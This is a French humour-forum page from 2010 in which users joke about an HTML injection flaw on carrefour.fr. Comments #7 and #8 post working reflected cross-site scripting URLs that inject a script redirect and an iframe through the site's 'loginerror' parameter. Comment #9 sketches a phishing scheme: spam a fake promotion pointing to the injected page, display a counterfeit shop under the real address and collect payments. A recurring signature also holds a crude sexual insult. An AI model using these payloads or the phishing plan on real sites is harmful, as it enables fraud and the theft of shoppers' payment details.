l'asile.fr

5

Avec Carrefour, je positive

de SimOOn , le 30 mars 2010 à 20:51 - (carrefour.fr) - 10 commentaires
Hop, vous aussi faites de l'injection HTML excellente.

Proposer une brève

Détail des votes

Il y a 7 pour et 2 contre. Ce qui fait au total 9 votes.

À lire cette semaine...

groove_salad
#1 hOrny Lettuce

Ha ha, excellent !


"Elle a tort la petite: vu sa tronche, une sodomie à la moutarde est ce qu'elle peut espérer de mieux."
plantmann, Poète maudit.
mardi
30 mars 2010, 20:56
 
 

stillcut
#2

Ma vue baisse ?


mardi
30 mars 2010, 22:10
 
 

bloute
#3

Installe linux.


mardi
30 mars 2010, 23:51
 
 

hohun
#4 Comique tripier

Hahaha


mercredi
31 mars 2010, 01:38
 
 

groove_salad
#5 hOrny Lettuce

.


"Elle a tort la petite: vu sa tronche, une sodomie à la moutarde est ce qu'elle peut espérer de mieux."
plantmann, Poète maudit.
mercredi
31 mars 2010, 08:19
 
 

gwendal
#6 Détourageophile

Hahahaha :)


- les fautes
mercredi
31 mars 2010, 08:24
 
 

Kane
#7 Satan m'habite

Encore plus fort !

http://www.carrefour.fr/portal/site/carrefour/?loginerror=<script>windows.location.replace("www.lemonparty.org")</script>

Humf, la balise URL foire ...


mercredi
31 mars 2010, 09:24
 
 

Akshell
#8

[url]http://www.carrefour.fr/portal/site/carrefour/?loginerror=%3Ciframe%20src=%22http://www.lemonparty.org%22%20width=%22800%22%20height=%22600%22%3E%3C/iframe%3E[/url]


mercredi
31 mars 2010, 10:14
 
 

Kane
#9 Satan m'habite

haha ouai, la bonne vieille balise iframe!

Il y a moyen d'exploiter ça bien comme il faut : un bon gros SPAM avec un article en promo qui redirige vers la page en question. Sur cette page on fait afficher un faux site carrefour avec la vraie URL dans le navigateur.

Faut juste que l'utilisateur ne capte pas qu'il n'est pas en SSL au moment de payer.


mercredi
31 mars 2010, 10:38
 
 

Akshell
#10

sûrement avec un truc du genre opener.location.replace("www.lemonparty.org") dans l'iframe
j'ai pas trop envie de tester mais ça doit être possible en effet.


mercredi
31 mars 2010, 11:38
 
 


Ajouter un commentaire

Vous devez être identifié pour poster un commentaire.

# 10:30:24
(carwin) 15:13:34 Roger that!
# 18:43:40
(carwin) 21:03:36 Comme tu dis :)
# 21:03:36
(Akshell) arghhh le certificat...
# 15:13:34
(plantmann) 19:52:23 Je t'enverrai un message quand j'aurai une machine capable de le lancer, si jamais tu y joue encore d'ici là :D
# 19:52:23
(carwin) Pas grave ! J'aurais tenté :)
# 21:11:34
(hohun) Mes horaires sont completement instables, ça fait bien longtemps que je ne peux plus jouer à des jeux en multi :(
# 19:12:17
(Akshell) j'ai résisté à la sortie du jeu, moyennement tenté
# 18:43:01
(carwin) C'te flop. Allez, bon noyelle à tous.
# 21:22:27
(carwin) Donc un petit hell divers 2, ça vous dit ?
# 18:47:01
(plantmann) Il a pas été enterré par Space Marine 2 ? J'avais l'impression qu'il avait pris la place, mais je peux me tromper...
lire la suite de la tribune